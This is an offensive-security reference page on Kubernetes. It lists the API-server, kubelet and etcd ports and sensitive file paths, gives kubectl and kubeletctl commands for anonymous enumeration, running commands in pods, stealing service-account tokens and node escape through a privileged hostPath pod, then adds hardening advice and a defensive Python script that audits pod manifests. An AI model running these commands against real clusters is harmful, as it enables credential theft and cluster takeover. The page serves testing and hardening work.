Kubernetes
aka k8s, kubelet
Container orchestration. The API server on 6443 and the kubelet on 10250 are the targets — anonymous API access or an exposed kubelet lets you run commands in pods and steal service-account tokens to take over the cluster.
Ports
| Port | Proto | Notes |
|---|---|---|
| 6443 | tcp | kube-apiserver |
| 10250 | tcp | kubelet API |
| 2379 | tcp | etcd (cluster secrets) |
Fingerprint
- 6443 serves the Kubernetes API (TLS); /version returns the build
- 10250 kubelet responds to /pods
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /var/run/secrets/kubernetes.io/serviceaccount/token | pod service-account JWT | sensitive |
| /etc/kubernetes/admin.conf | cluster-admin kubeconfig | sensitive |
Exploitation primitives
- Anonymous API access → check rights with `kubectl auth can-i --list`
- Exposed kubelet (10250) → list pods and exec commands with kubeletctl
- Steal a pod's service-account token, then pivot via the API; mount hostPath / to escape to the node
Overview
Kubernetes runs containers across nodes. The two reachable attack surfaces are the API server (6443) and the kubelet (10250); from either, the goal is to run commands in pods and harvest service-account tokens to escalate to cluster admin.
Enumerate the API server
Version + anonymous access:
curl -k https://<TARGET>:6443/version
What the anonymous user (or your token) is allowed to do:
kubectl --server=https://<TARGET>:6443 --insecure-skip-tls-verify auth can-i --list
Attack the kubelet (10250)
List pods:
kubeletctl -i --server <TARGET> pods
Run a command in a pod:
kubeletctl -i --server <TARGET> exec "id" -p <pod> -c <container>
Steal a pod's service-account token, then drive the API:
kubeletctl -i --server <TARGET> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <pod> -c <container>
Node escape
Deploy a pod that hostPath-mounts / to read/write the host filesystem (privileged pod → node root).
Hardening
Disable anonymous auth on both the API server and the kubelet (`--anonymous-auth=false`), require kubelet authn/authz (`--authorization-mode=Webhook` on the kubelet), apply RBAC least privilege, and restrict hostPath volumes and privileged containers with an admission policy.
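The following is an added example (not from the original page) of the admission-side check the last hardening item calls for: it audits Pod manifests, given as plain dicts in the shape an admission webhook receives, for the node-escape primitives described above. The sample manifests are constructed; `audit_pod` and its severity labels are my own naming.

```python
# Audit Pod manifests for the node-escape primitives described on this page:
# privileged containers, hostPath volumes (especially "/"), and pods that
# still auto-mount a service-account token that an attacker could steal.

def audit_pod(pod: dict) -> list[str]:
    """Return findings for one Pod manifest dict (empty list = clean)."""
    findings = []
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    spec = pod.get("spec", {})

    # hostPath exposes the node filesystem; mounting "/" is the escape
    # described under "Node escape".
    for vol in spec.get("volumes", []):
        host = vol.get("hostPath")
        if host:
            path = host.get("path", "")
            sev = "CRITICAL" if path == "/" else "HIGH"
            findings.append(f"{sev}: {name}: hostPath volume {vol.get('name')} -> {path}")

    # privileged containers reach host devices and kernel interfaces
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"CRITICAL: {name}: container {c.get('name')} is privileged")

    # a pod that does not talk to the API should not carry a token to steal
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"LOW: {name}: service-account token auto-mounted")

    return findings


# Constructed sample manifests: one escape pod, one hardened pod.
ESCAPE_POD = {
    "metadata": {"name": "evil"},
    "spec": {
        "containers": [{"name": "sh", "image": "busybox",
                        "securityContext": {"privileged": True},
                        "volumeMounts": [{"name": "root", "mountPath": "/host"}]}],
        "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
    },
}
SAFE_POD = {
    "metadata": {"name": "web"},
    "spec": {"automountServiceAccountToken": False,
             "containers": [{"name": "nginx", "image": "nginx"}]},
}

if __name__ == "__main__":
    for p in (ESCAPE_POD, SAFE_POD):
        print(p["metadata"]["name"], audit_pod(p) or ["clean"])
```

The same function can be run over `kubectl get pods -A -o json` output by iterating its `items` list, which turns it into a quick cluster-wide sweep for pods that already have these properties.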